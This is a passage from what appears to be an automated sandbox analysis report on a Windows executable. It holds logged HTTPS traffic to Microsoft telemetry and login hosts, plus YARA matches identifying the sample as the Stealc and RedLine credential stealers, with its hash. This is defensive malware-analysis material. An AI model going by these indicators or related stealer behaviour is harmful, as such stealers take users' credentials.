                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:44 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:44 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1427
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 18f8d736-c01e-00a2-252b-272327000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210244Z-r197bdfb6b4d9xksru4x6qbqr000000005p0000000005mak
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:44 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                144192.168.2.54992113.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:44 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:44 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:44 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1401
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: ee736da1-b01e-001e-7be0-260214000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210244Z-17c5cb586f6g6g2sa7kg5c0gg000000000v000000000cwqq
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:44 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                145192.168.2.54992213.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:45 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:45 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:45 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1364
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 4e9c2d7b-a01e-0053-0a2e-278603000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210245Z-15b8d89586fvpb59307bn2rcac00000000ng00000000g9e8
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:45 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                146192.168.2.54992413.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:45 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:45 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:45 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1391
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 4fde2afa-301e-0099-279b-276683000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210245Z-17c5cb586f626sn8grcgm1gf8000000003y000000000nsba
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:45 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                147192.168.2.54992513.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:45 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:45 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:45 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1354
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 8ce6a12a-601e-005c-62fe-26f06f000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210245Z-16849878b78z2wx67pvzz63kdg000000045g00000000dvpn
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:45 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                148192.168.2.54992613.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:45 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:45 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:45 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1403
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: b03ac640-101e-007a-1bc8-27047e000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210245Z-17c5cb586f64v7xsc2ahm8gsgw00000000eg000000005g6b
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:45 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                149192.168.2.54992320.190.159.0443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:45 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                                Content-Length: 4775
                                                                                                                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:45 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:45 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Expires: Mon, 28 Oct 2024 21:01:45 GMT
                                                                                                                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                x-ms-route-info: C555_BAY
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 655eb5b7-f0e9-4719-98ad-d0a90d857bd8
                                                                                                                                                                                                                                                                                                                                PPServer: PPV: 30 H: PH1PEPF0001B7E8 V: 0
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:45 GMT
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Length: 11412
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:45 UTC11412INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                                                                                Start time:17:01:58
                                                                                                                                                                                                                                                                                                                                Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\hwWxZRwpeL.exe"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:720'896 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:AE721F6A78BDD19999A514E3F1BA8053
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2589210016.000000000078E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2044823834.0000000002550000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2589608743.0000000002340000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2589754739.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
